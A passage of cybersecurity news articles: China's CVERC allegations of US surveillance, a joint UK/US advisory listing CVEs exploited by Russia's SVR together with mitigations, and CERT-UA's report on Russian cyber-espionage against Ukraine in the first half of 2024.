of data from global internet traffic. UpStream, according to the report, is designed to capture raw communication data passing through key internet infrastructure like submarine fiber optic cables, while Prism allows U.S. intelligence agencies to access user data from major tech companies like Microsoft, Google, and Facebook. By combining these two systems, the U.S. allegedly maintains the ability to monitor vast quantities of data in real-time. This capability provides actionable intelligence for military, diplomatic, and economic purposes, making the U.S. a formidable player in the world of cyber espionage. But it’s not just foreign adversaries that are affected. The report suggests that U.S. citizens, despite legal protections like FISA Section 702, also fall under the watchful eye of these surveillance programs. The Foreign Intelligence Surveillance Court itself has acknowledged several violations, pointing to instances where U.S. intelligence agencies allegedly overstepped their bounds, the report suggests. Backdoor Implants and Supply Chain Attacks Another concerning element is the claim that U.S. intelligence agencies conduct supply chain attacks, where they insert backdoors into hardware and software products sold to foreign targets. Once compromised, these products can act as entry points for further espionage. The National Security Agency’s (NSA) Office of Tailored Access Operations (TAO) allegedly plays a key role in these activities. By intercepting shipments of network equipment, disassembling them, and implanting malicious backdoors, the NSA ensures long-term access to compromised systems. These supply chain attacks represent one of the most covert and effective ways to infiltrate secure networks, posing significant risks to critical infrastructure across the globe, China said. Global Fallout: Targeting Allies and Adversaries Alike China added that U.S.’ espionage activities haven’t been limited to adversaries. It said, allies such as Germany, France, and Japan have also found themselves under the surveillance lens, with high-level communications reportedly intercepted as part of broader intelligence-gathering efforts. For instance, German Chancellor Angela Merkel’s communications were allegedly monitored by U.S. intelligence, causing a diplomatic rift between the two nations when the operation was exposed, CVERC reported. Similar accusations have surfaced regarding France, with the NSA reportedly eavesdropping on phone calls from French government officials and business leaders. U.S. Companies’ Role in Espionage Microsoft, one of the largest cloud and enterprise software providers globally, has found itself entangled in these accusations. According to the report, Microsoft’s tools and platforms may be integral to U.S. intelligence operations, providing both the infrastructure and capabilities for data collection. The report also alleges that Microsoft has been developing tools specifically for U.S. intelligence, further deepening its collaboration with the federal government. This relationship, the report suggests, raises serious questions about privacy and the ethical implications of corporate cooperation in state-led surveillance activities. Interestingly, both Microsoft and the U.S. government have time and again placed the same accusations on Volt Typhoon, which China has disputed.

Russian Foreign Intelligence Service (SVR) cyber actors are once again in the spotlight, exploiting widespread vulnerabilities in a global campaign aimed at government, technology, and finance sectors. In a new joint advisory, the UK’s National Cyber Security Centre (NCSC) and U.S. agencies warned that SVR cyber operations, known for the SolarWinds attack and targeting COVID-19 vaccine research, have shifted their focus to unpatched software vulnerabilities across a range of sectors. “Russian cyber actors are interested in and highly capable of accessing unpatched systems across a range of sectors, and once they are in, they can exploit this access to meet their objectives.” – Paul Chichester, NCSC Director of Operations SVR’s Tactics: A Persistent Global Threat The SVR, also referred to as APT29 or Cozy Bear, has demonstrated an alarming ability to exploit known vulnerabilities, particularly those left unpatched by organizations. The group is infamous for its persistent and stealthy cyber operations, often targeting government entities, think tanks, and private corporations to collect foreign intelligence. One key aspect of their approach is the two types of targets they pursue. The first includes entities of strategic interest such as governments, financial institutions, and technology companies. These “targets of intent” are carefully selected for their intelligence value. The second group, known as “targets of opportunity,” consists of any organization with unpatched systems that can be exploited for malicious purposes. SVR Exploiting Unpatched Vulnerabilities at Scale The advisory includes over 20 publicly disclosed vulnerabilities that SVR actors are actively targeting. Organizations across the globe, including those in the UK, are being urged to rapidly deploy patches and prioritize software updates to minimize exposure to these threats. Once SVR actors gain initial access through unpatched systems, they can escalate privileges and move laterally across networks, often compromising connected systems such as supply chains. This enables them to launch further operations, including espionage, data exfiltration, and network disruption. Following is the complete list of unpatched vulnerabilities that Russian SVR was observed exploiting: CVE Vendor/Product Details CVE-2023-20198 Cisco IOS XE Software web UI feature Privilege escalation vulnerability that allows an attacker to create a local user and password combination CVE-2023-4911 RHSA GNU C Library’s dynamic loader ld.so Buffer overflow vulnerability that could allow a local attacker to execute code with elevated privileges CVE-2023-38545 Haxx Libcurl SOCKS5 heap buffer overflow vulnerability CVE-2023-38546 Haxx Libcurl Missing authorization vulnerability that allows an attacker to insert cookies in a running program if certain conditions are met CVE-2023-40289 Supermicro X11SSM-F, X11SAE-F, and X11SSE- F 1.66 Command injection vulnerability that allows an attacker to elevate privileges CVE-2023-24023 Bluetooth BR/EDR devices with Secure Simple Pairing and Secure Connections pairing in Bluetooth Core Specification 4.2 through 5.4 Allows certain man-in-the-middle attacks that force a short key length [CWE-326], and might lead to discovery of the encryption key and live injection, aka BLUFFS. CVE-2023-40088 Android Use after free vulnerability that could lead to remote (proximal, adjacent) code execution CVE-2023-40076 Google Android 14.0 Permissions bypass vulnerability that allows an attacker to access credentials and escalate local privileges CVE-2023-40077 Google Android 11-14 Use after free vulnerability that can lead to escalation of privileges CVE-2023-45866 Bluetooth HID Hosts in BlueZ Improper authentication vulnerability that could allow an attacker in close proximity to inject keystrokes and carry out arbitrary commands CVE-2022-40507 Qualcomm Double free vulnerability CVE-2023-36745 Microsoft Exchange Server Remote code execution CVE-2023-4966 Citrix NetScaler ADC, NetScaler Gateway Buffer overflow vulnerability CVE-2023-6345 Google Chrome Integer overflow vulnerability that allows a remote attacker to potentially perform a sandbox escape via a malicious file CVE-2023-37580 Zimbra Cross-site scripting (XSS) vulnerability CVE-2021-27850 Apache Tapestry Critical unauthenticated remote code execution vulnerability CVE-2021-41773 Apache HTTP server 2.4.99 Directory traversal vulnerability CVE-2021-42013 Apache HTTP server 2.4.50 Remote code execution vulnerability CVE-2018-13379 Fortinet FortiGate SSL VPN Path traversal vulnerability CVE-2023-42793 JetBrains TeamCity Authentication bypass vulnerability CVE-2023-29357 SharePoint Server Elevation of privilege vulnerability CVE-2023-24955 SharePoint Server Remote code execution vulnerability CVE-2023-35078 Ivanti Endpoint Manager Mobile versions through 11.10 Authentication bypass vulnerability CVE-2023-5044 Kubernetes Ingress-nginx Code injection vulnerability Not Just a Cybersecurity Threat: Broader Implications The report also sheds light on how SVR actors adapt their techniques to keep pace with evolving technology. The NCSC warns that the group has adjusted its approach in response to the increasing reliance on cloud infrastructure, exploiting cloud misconfigurations and weak security practices. This makes them a formidable adversary for organizations that are migrating or already relying heavily on cloud services. SVR actors have also been linked to recent large-scale attacks, including the supply chain compromise of SolarWinds and a series of spear-phishing campaigns targeting COVID-19 vaccine research. These incidents demonstrate the group’s focus on strategic assets and their potential to impact national security and public health. APT29’s Arsenal: From Phishing to Supply Chain Attacks The advisory also outlines the tactics, techniques, and procedures (TTPs) employed by SVR cyber actors. Their arsenal includes spear-phishing campaigns, password spraying, supply chain attacks, and the abuse of trusted relationships. These methods allow them to gain initial access and conduct follow-up operations from compromised accounts. For instance, in recent campaigns, SVR actors were found to exploit cloud environments using Microsoft Teams accounts impersonating technical support to trick victims into granting access. By compromising poorly secured small business accounts, they were able to create platforms for targeting high-profile organizations. Infrastructure and Evasion Tactics SVR cyber actors are known for their ability to remain undetected for extended periods. They frequently use The Onion Router (TOR) network and proxy services to obfuscate their activity. In some cases, they lease infrastructure using fake identities and low-reputation email accounts to avoid detection. When SVR suspects that their operations have been uncovered, they move quickly to destroy their infrastructure and any evidence on it. This evasive approach makes it difficult for investigators to trace their operations back to the original source. Recent Exploitations: Zimbra, JetBrains, and More SVR actors have also been involved in exploiting several high-profile vulnerabilities. For example, the advisory mentions the exploitation of Zimbra mail servers using CVE-2022-27924, a command injection vulnerability that allowed attackers to access user credentials without victim interaction. More recently, they exploited JetBrains TeamCity’s CVE-2023-42793 vulnerability, enabling arbitrary code execution. This kind of exploitation highlights SVR’s focus on widely used software systems, allowing them to infiltrate a broad range of sectors and geographies. Mitigations: What Organizations Can Do In light of these ongoing campaigns, the NCSC and U.S. agencies have provided several recommendations to help organizations defend against SVR cyber actors. These include: Rapid deployment of patches and updates: Organizations should prioritize software updates as soon as they become available to close known vulnerabilities. Multi-factor authentication: Implementing multi-factor authentication across networks and systems can reduce the risk of unauthorized access. Auditing cloud accounts: Regularly auditing cloud-based accounts for unusual activity can help detect intrusions before they escalate. Reducing attack surface: Disable unnecessary internet-facing services and remove unused applications to limit points of entry for attackers.

Moscow preferred espionage over destruction in its cyber offensive strategy against Ukraine in the first half of 2024, displaying the evolving nature of Kremlin’s targeted cyberattacks on Kyiv. The cyber battlefield has shifted in 2024, with Russian hacker groups adopting more covert and long-term strategies. Rather than the large-scale infrastructure attacks seen in previous years, Russian cyber operatives have turned to espionage, focusing on military and critical infrastructure targets to support their ongoing war against Ukraine. While cyber incidents have risen overall, the number of high and critical severity attacks has dropped. This shift marks a strategic change, moving from broad, destructive cyberattacks to more focused and sustained infiltration efforts aimed at gathering intelligence. The Numbers Behind the Attacks A report released on Monday by the Computer Emergency Response Team of Ukraine revealed this shift in focus. H1 2024 saw a total of 1,739 cyber incidents, a 19% increase from the second half of 2023. However, the number of critical incidents dropped by 90%, with only three reported in the first half of 2024 compared to 31 in the latter half of 2023. High-severity incidents also saw a sharp decline, falling by 71%, while medium and low-severity incidents increased by 32% and 75%, respectively. Source: SSSCIP This data suggests that while the overall frequency of cyberattacks has grown, the attackers’ tactics have shifted towards lower-profile activities designed to avoid detection. These lower-severity incidents often involve malware distribution, espionage, and efforts to maintain access to compromised systems rather than causing immediate, visible damage. Source: SSSCIP Targeted Espionage and Covert Operations In 2022 and 2023, Russian hackers focused on disrupting Ukraine’s critical infrastructure, aiming to cripple government agencies, energy providers, and internet service providers (ISPs). However, the swift recovery of Ukraine’s systems meant these attacks did not achieve their intended long-term goals. The 2024 shift towards espionage reflects a more calculated approach. Groups like UAC-0184 and UAC-0020 aka Vermin hacker group, both linked to Russian intelligence services, have been particularly active this year. These groups specialize in cyber espionage, using phishing campaigns and malicious software to gain access to sensitive systems. UAC-0184, for example, has targeted members of Ukraine’s Defense Forces through messaging apps like Signal, impersonating trusted contacts to distribute malware. Once the malware is deployed, the hackers can monitor communications, steal data, and maintain long-term control over the compromised systems. This pivot from overt attacks to espionage also marks a new phase in Russia’s cyber strategy. Rather than causing immediate disruption, the focus now lies in gathering intelligence to support military operations. CERT-UA’s report highlights how hackers are using cyber operations to collect feedback on kinetic military strikes, such as missile attacks. Critical Infrastructure Still in Focus Though espionage has taken center stage, attacks on critical infrastructure continue. The report notes that attacks on Ukraine’s energy sector have more than doubled since the latter half of 2023, with hackers increasingly targeting industrial control systems (ICS) used by power, heat, and water supply facilities. The UAC-0002 group, which has ties to Russian law enforcement in occupied Luhansk, executed a significant supply chain attack in March 2024. The hackers exploited vulnerabilities in software used by at least 20 energy companies, gaining access to ICS and using it for lateral movement within the networks. This kind of supply chain attack allows hackers to breach multiple organizations simultaneously by targeting a common service provider. In the March incident, UAC-0002 targeted three supply chains, infecting multiple energy companies with malware and backdoors. The attackers used specialized software, such as LOADGRIP and BIASBOAT, to gain access to critical systems and escalate their attacks, possibly to complement physical strikes on Ukrainian infrastructure. Messenger Account Theft: New Entrant in Cyber Offensive Strategy Another notable trend in 2024 is the increasing focus on messenger account theft. Platforms like WhatsApp and Telegram, widely used by Ukrainian citizens, have become prime targets for Russian hackers. Source: SSSCIP The UAC-0195 group, for instance, used phishing campaigns to compromise thousands of messenger accounts. These compromised accounts are then used for a range of malicious activities, including spreading malware, conducting espionage, and committing financial fraud. In one instance, hackers posed as organizers of a petition to honor a fallen Ukrainian soldier. They directed victims to a fake website mimicking the President of Ukraine’s official page, where users were asked to authenticate via WhatsApp. This phishing tactic allowed hackers to add their devices to victims’ WhatsApp accounts, gaining access to personal messages, files, and contacts. This tactic extended to Telegram, where hackers used a similar method to lure users into “voting” in an art competition, once again gaining unauthorized access to accounts. With this access, hackers can impersonate the account holder, spread further phishing links, and even steal sensitive information from high-value targets. The latest findings were revealed just days after Ukraine banned the use of Telegram messenger app on any of the government, military or critical infrastructure-linked devices. This decisive move follows growing concerns over its vulnerability to cyber espionage. The NCSCC’s meeting on September 19 highlighted how the widely used app has transformed from a tool for free speech into a weapon of war. Phishing Campaigns and Malware Distribution Phishing remains a key tool for Russian hackers. In early 2024, UAC-0006, a financially motivated group, continued its phishing campaigns targeting employees in financial departments. These campaigns often used polyglot archives—files that appear differently depending on the software used to open them—to deliver malware like SmokeLoader. Once deployed, SmokeLoader allows attackers to install additional malware, such as TALESHOT, which captures screenshots when a banking application is open. This malware enables hackers to gain a deeper understanding of the victim’s activities and access critical financial data. In some cases, hackers even edited or created fraudulent invoices to steal funds from targeted organizations. The UAC-0006 group briefly paused operations in March 2024, but returned in May with renewed efforts, registering new domains to continue phishing attacks and regain control over previously compromised systems. Ukraine’s Cyber Resilience: A Battle on Two Fronts Despite the rising number of cyberattacks, Ukraine’s cyber defenses have shown remarkable resilience. CERT-UA, in collaboration with the State Service for Special Communications and Information Protection (SSSCIP), has made significant strides in defending against these threats. Their efforts have resulted in a sharp decline in high-severity incidents, even as overall attack numbers rise. The report credits improved visibility and collaboration with international partners for this success. Enhanced detection capabilities, coupled with better awareness among organizations, have allowed Ukraine to respond more quickly to emerging threats. This collaboration includes sharing cyber threat intelligence with CERT-UA’s partners, which has helped identify and mitigate numerous attacks. However, the report also warns that the capabilities of Russian hackers continue to grow as the war drags on. The increasing sophistication of supply chain attacks and the persistent threat of phishing campaigns mean that Ukraine’s cyber defense strategies will be tested time and again.